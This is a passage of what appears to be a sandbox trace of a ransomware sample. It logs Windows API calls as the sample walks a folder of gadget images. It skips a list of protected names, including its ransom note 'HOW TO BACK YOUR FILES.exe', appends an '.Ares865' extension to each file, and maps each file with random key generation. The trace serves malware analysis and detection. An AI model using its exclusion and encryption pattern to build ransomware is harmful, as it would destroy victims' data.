ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x17b9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="19.png", cAlternateFileName="")) returned 1 [0115.688] lstrcmpiW (lpString1="19.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.688] lstrcmpiW (lpString1="19.png", lpString2="aoldtz.exe") returned -1 [0115.688] lstrcmpiW (lpString1="19.png", lpString2=".") returned 1 [0115.688] lstrcmpiW (lpString1="19.png", lpString2="..") returned 1 [0115.688] lstrcmpiW (lpString1="19.png", lpString2="windows") returned -1 [0115.688] lstrcmpiW (lpString1="19.png", lpString2="bootmgr") returned -1 [0115.688] lstrcmpiW (lpString1="19.png", lpString2="temp") returned -1 [0115.688] lstrcmpiW (lpString1="19.png", lpString2="pagefile.sys") returned -1 [0115.688] lstrcmpiW (lpString1="19.png", lpString2="boot") returned -1 [0115.688] lstrcmpiW (lpString1="19.png", lpString2="ids.txt") returned -1 [0115.688] lstrcmpiW (lpString1="19.png", lpString2="ntuser.dat") returned -1 [0115.688] lstrcmpiW (lpString1="19.png", lpString2="perflogs") returned -1 [0115.688] lstrcmpiW (lpString1="19.png", lpString2="MSBuild") returned -1 [0115.688] lstrlenW (lpString="19.png") returned 6 [0115.688] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png") returned 75 [0115.688] lstrcpyW (in: lpString1=0x2cce48a, lpString2="19.png" | out: lpString1="19.png") returned="19.png" [0115.688] lstrlenW (lpString="19.png") returned 6 [0115.688] lstrlenW (lpString="Ares865") returned 7 [0115.688] lstrlenW (lpString=".dll") returned 4 [0115.688] lstrcmpiW (lpString1="19.png", lpString2=".dll") returned 1 [0115.689] lstrlenW (lpString=".lnk") returned 4 [0115.689] lstrcmpiW (lpString1="19.png", lpString2=".lnk") returned 1 [0115.689] lstrlenW (lpString=".ini") returned 4 [0115.689] lstrcmpiW (lpString1="19.png", lpString2=".ini") returned 1 [0115.689] lstrlenW (lpString=".sys") returned 4 [0115.689] lstrcmpiW (lpString1="19.png", lpString2=".sys") returned 1 [0115.689] lstrlenW (lpString="19.png") returned 6 [0115.689] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png.Ares865") returned 83 [0115.689] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\19.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\19.png.ares865"), dwFlags=0x1) returned 1 [0115.691] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\19.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.691] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6073) returned 1 [0115.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.691] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.692] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.692] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.692] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1ac0, lpName=0x0) returned 0x170 [0115.694] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1ac0) returned 0x190000 [0115.695] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.695] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.695] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.695] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.695] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.696] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.696] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0115.696] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.696] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0115.696] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.696] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.696] CloseHandle (hObject=0x170) returned 1 [0115.696] CloseHandle (hObject=0x118) returned 1 [0115.696] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.696] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.696] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.696] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0f1aec, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0f1aec, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1px.gif", cAlternateFileName="")) returned 1 [0115.696] lstrcmpiW (lpString1="1px.gif", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.696] lstrcmpiW (lpString1="1px.gif", lpString2="aoldtz.exe") returned -1 [0115.697] lstrcmpiW (lpString1="1px.gif", lpString2=".") returned 1 [0115.697] lstrcmpiW (lpString1="1px.gif", lpString2="..") returned 1 [0115.697] lstrcmpiW (lpString1="1px.gif", lpString2="windows") returned -1 [0115.697] lstrcmpiW (lpString1="1px.gif", lpString2="bootmgr") returned -1 [0115.697] lstrcmpiW (lpString1="1px.gif", lpString2="temp") returned -1 [0115.697] lstrcmpiW (lpString1="1px.gif", lpString2="pagefile.sys") returned -1 [0115.697] lstrcmpiW (lpString1="1px.gif", lpString2="boot") returned -1 [0115.697] lstrcmpiW (lpString1="1px.gif", lpString2="ids.txt") returned -1 [0115.697] lstrcmpiW (lpString1="1px.gif", lpString2="ntuser.dat") returned -1 [0115.697] lstrcmpiW (lpString1="1px.gif", lpString2="perflogs") returned -1 [0115.697] lstrcmpiW (lpString1="1px.gif", lpString2="MSBuild") returned -1 [0115.697] lstrlenW (lpString="1px.gif") returned 7 [0115.697] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png") returned 75 [0115.697] lstrcpyW (in: lpString1=0x2cce48a, lpString2="1px.gif" | out: lpString1="1px.gif") returned="1px.gif" [0115.697] lstrlenW (lpString="1px.gif") returned 7 [0115.697] lstrlenW (lpString="Ares865") returned 7 [0115.697] lstrlenW (lpString=".dll") returned 4 [0115.697] lstrcmpiW (lpString1="1px.gif", lpString2=".dll") returned 1 [0115.697] lstrlenW (lpString=".lnk") returned 4 [0115.697] lstrcmpiW (lpString1="1px.gif", lpString2=".lnk") returned 1 [0115.697] lstrlenW (lpString=".ini") returned 4 [0115.697] lstrcmpiW (lpString1="1px.gif", lpString2=".ini") returned 1 [0115.697] lstrlenW (lpString=".sys") returned 4 [0115.697] lstrcmpiW (lpString1="1px.gif", lpString2=".sys") returned 1 [0115.697] lstrlenW (lpString="1px.gif") returned 7 [0115.698] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1px.gif.Ares865") returned 84 [0115.698] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1px.gif" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\1px.gif"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1px.gif.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\1px.gif.ares865"), dwFlags=0x1) returned 1 [0115.699] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1px.gif.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\1px.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.700] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=43) returned 1 [0115.700] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.700] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.700] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.700] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.701] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.701] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.701] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x330, lpName=0x0) returned 0x170 [0115.703] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x330) returned 0x190000 [0115.704] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.705] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.705] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.705] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.705] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.705] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.705] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.705] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0115.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0115.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.705] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.705] CloseHandle (hObject=0x170) returned 1 [0115.705] CloseHandle (hObject=0x118) returned 1 [0115.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.706] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc117c4b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc117c4b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1456, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2.png", cAlternateFileName="")) returned 1 [0115.706] lstrcmpiW (lpString1="2.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.706] lstrcmpiW (lpString1="2.png", lpString2="aoldtz.exe") returned -1 [0115.706] lstrcmpiW (lpString1="2.png", lpString2=".") returned 1 [0115.706] lstrcmpiW (lpString1="2.png", lpString2="..") returned 1 [0115.706] lstrcmpiW (lpString1="2.png", lpString2="windows") returned -1 [0115.706] lstrcmpiW (lpString1="2.png", lpString2="bootmgr") returned -1 [0115.706] lstrcmpiW (lpString1="2.png", lpString2="temp") returned -1 [0115.706] lstrcmpiW (lpString1="2.png", lpString2="pagefile.sys") returned -1 [0115.706] lstrcmpiW (lpString1="2.png", lpString2="boot") returned -1 [0115.706] lstrcmpiW (lpString1="2.png", lpString2="ids.txt") returned -1 [0115.706] lstrcmpiW (lpString1="2.png", lpString2="ntuser.dat") returned -1 [0115.706] lstrcmpiW (lpString1="2.png", lpString2="perflogs") returned -1 [0115.706] lstrcmpiW (lpString1="2.png", lpString2="MSBuild") returned -1 [0115.706] lstrlenW (lpString="2.png") returned 5 [0115.706] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1px.gif") returned 76 [0115.706] lstrcpyW (in: lpString1=0x2cce48a, lpString2="2.png" | out: lpString1="2.png") returned="2.png" [0115.706] lstrlenW (lpString="2.png") returned 5 [0115.706] lstrlenW (lpString="Ares865") returned 7 [0115.706] lstrlenW (lpString=".dll") returned 4 [0115.706] lstrcmpiW (lpString1="2.png", lpString2=".dll") returned 1 [0115.706] lstrlenW (lpString=".lnk") returned 4 [0115.706] lstrcmpiW (lpString1="2.png", lpString2=".lnk") returned 1 [0115.706] lstrlenW (lpString=".ini") returned 4 [0115.706] lstrcmpiW (lpString1="2.png", lpString2=".ini") returned 1 [0115.706] lstrlenW (lpString=".sys") returned 4 [0115.707] lstrcmpiW (lpString1="2.png", lpString2=".sys") returned 1 [0115.707] lstrlenW (lpString="2.png") returned 5 [0115.707] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png.Ares865") returned 82 [0115.707] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\2.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\2.png.ares865"), dwFlags=0x1) returned 1 [0115.708] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\2.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.708] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5206) returned 1 [0115.708] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.709] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.709] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.709] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.709] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.709] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.710] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1760, lpName=0x0) returned 0x170 [0115.711] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1760) returned 0x190000 [0115.712] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.713] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.713] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.713] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.713] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0115.713] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.713] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0115.713] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.713] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.713] CloseHandle (hObject=0x170) returned 1 [0115.713] CloseHandle (hObject=0x118) returned 1 [0115.714] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.714] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.714] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.714] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc13ddaa, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc13ddaa, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x17b9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="20.png", cAlternateFileName="")) returned 1 [0115.714] lstrcmpiW (lpString1="20.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.714] lstrcmpiW (lpString1="20.png", lpString2="aoldtz.exe") returned -1 [0115.714] lstrcmpiW (lpString1="20.png", lpString2=".") returned 1 [0115.714] lstrcmpiW (lpString1="20.png", lpString2="..") returned 1 [0115.714] lstrcmpiW (lpString1="20.png", lpString2="windows") returned -1 [0115.714] lstrcmpiW (lpString1="20.png", lpString2="bootmgr") returned -1 [0115.714] lstrcmpiW (lpString1="20.png", lpString2="temp") returned -1 [0115.714] lstrcmpiW (lpString1="20.png", lpString2="pagefile.sys") returned -1 [0115.714] lstrcmpiW (lpString1="20.png", lpString2="boot") returned -1 [0115.714] lstrcmpiW (lpString1="20.png", lpString2="ids.txt") returned -1 [0115.714] lstrcmpiW (lpString1="20.png", lpString2="ntuser.dat") returned -1 [0115.714] lstrcmpiW (lpString1="20.png", lpString2="perflogs") returned -1 [0115.714] lstrcmpiW (lpString1="20.png", lpString2="MSBuild") returned -1 [0115.714] lstrlenW (lpString="20.png") returned 6 [0115.714] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png") returned 74 [0115.714] lstrcpyW (in: lpString1=0x2cce48a, lpString2="20.png" | out: lpString1="20.png") returned="20.png" [0115.714] lstrlenW (lpString="20.png") returned 6 [0115.714] lstrlenW (lpString="Ares865") returned 7 [0115.714] lstrlenW (lpString=".dll") returned 4 [0115.714] lstrcmpiW (lpString1="20.png", lpString2=".dll") returned 1 [0115.714] lstrlenW (lpString=".lnk") returned 4 [0115.715] lstrcmpiW (lpString1="20.png", lpString2=".lnk") returned 1 [0115.715] lstrlenW (lpString=".ini") returned 4 [0115.715] lstrcmpiW (lpString1="20.png", lpString2=".ini") returned 1 [0115.715] lstrlenW (lpString=".sys") returned 4 [0115.715] lstrcmpiW (lpString1="20.png", lpString2=".sys") returned 1 [0115.715] lstrlenW (lpString="20.png") returned 6 [0115.715] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png.Ares865") returned 83 [0115.715] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\20.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\20.png.ares865"), dwFlags=0x1) returned 1 [0115.716] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\20.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.716] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6073) returned 1 [0115.716] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.717] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.717] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.717] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.718] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1ac0, lpName=0x0) returned 0x170 [0115.719] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1ac0) returned 0x190000 [0115.720] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.721] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.721] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.721] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.721] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.721] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.721] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.721] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.721] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.721] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0115.721] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.721] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0115.721] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.721] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.722] CloseHandle (hObject=0x170) returned 1 [0115.722] CloseHandle (hObject=0x118) returned 1 [0115.722] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.722] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.722] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.722] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc13ddaa, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc13ddaa, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x17b9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="21.png", cAlternateFileName="")) returned 1 [0115.722] 